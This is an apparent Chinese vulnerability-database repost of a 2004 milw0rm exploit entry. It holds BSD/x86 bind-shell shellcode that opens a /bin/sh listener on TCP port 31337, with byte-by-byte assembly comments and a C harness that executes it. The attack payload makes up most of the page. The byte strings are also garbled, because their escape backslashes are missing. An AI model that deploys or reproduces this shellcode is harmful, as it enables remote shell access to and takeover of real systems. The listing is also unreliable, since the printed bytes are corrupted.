BSD/x86 – Bind (31337/TCP) Shell Shellcode (83 bytes)
漏洞ID | 1054688 | 漏洞类型 | |
发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | BSD_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* portbinding execve() shellcode (port 31337) bsd/x86 (83b) - no1 (greyhats.za.net) */
char shellc0de[]=
"x99" // cdq
"x52" // pushl %edx
"x6ax01" // pushl $0x01
"x6ax02" // pushl $0x02
"xb0x61" // movb $0x61,%al
"x50" // pushl %eax
"xcdx80" // int $0x80
"x52" // pushl %edx
"x68xffx02x7ax69" // pushl $0x697a02ff
"x89xe3" // movl %esp,%ebx
"x6ax10" // push $0x10
"x53" // pushl %ebx
"x50" // pushl %eax
"x93" // xchg %eax,%ebx
"x31xc0" // xorl %eax,%eax
"xb0x68" // movb $0x68,%al
"x50" // pushl %eax
"xcdx80" // int $0x80
"x53" // pushl %ebx
"xb0x6a" // movb $0x6a,%al
"x50" // pushl %eax
"xcdx80" // int $0x80
"x31xc0" // xorl %eax,%eax
"x50" // pushl %eax
"x50" // pushl %eax
"x53" // pushl %ebx
"xb0x1e" // movb $0x1e,%al
"x50" // pushl %eax
"xcdx80" // int $0x80
"x93" // xchg %eax,%ebx
"x89xc1" // movl %eax,%ecx
// looper:
"x31xc0" // xor %eax,%eax
"x51" // pushl %ecx
"x53" // pushl %ebx
"xb0x5a" // movb $0x5a,%al
"x50" // pushl %eax
"xcdx80" // int $0x80
"x49" // decl %ecx
"x79xf4" // jns looper
"x50" // pushl %eax
"x68x2fx2fx73x68" // pushl $0x68732f2f
"x68x2fx62x69x6e" // pushl $0x6e69622f
"x89xe3" // movl %esp,%ebx
"x50" // pushl %eax
"x54" // pushl %esp
"x53" // pushl %ebx
"xb0x3b" // movb $0x3b,%al
"x50" // pushl %eax
"xcdx80"; // int $0x80
int
main()
{
void(*sc)()=(void *)shellc0de;
printf("nportbinding execve() shellcode (port 31337) bsd/x86 (%db) - no1 (greyhats.za.net)n",strlen(shellc0de));
sc();
return;
}
// milw0rm.com [2004-09-26]
相关推荐: UltraEdit FTP Client Weak Password Encryption Vulnerability
UltraEdit FTP Client Weak Password Encryption Vulnerability 漏洞ID 1102954 漏洞类型 Design Error 发布时间 2001-08-23 更新时间 2001-08-23 CVE编号 N…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666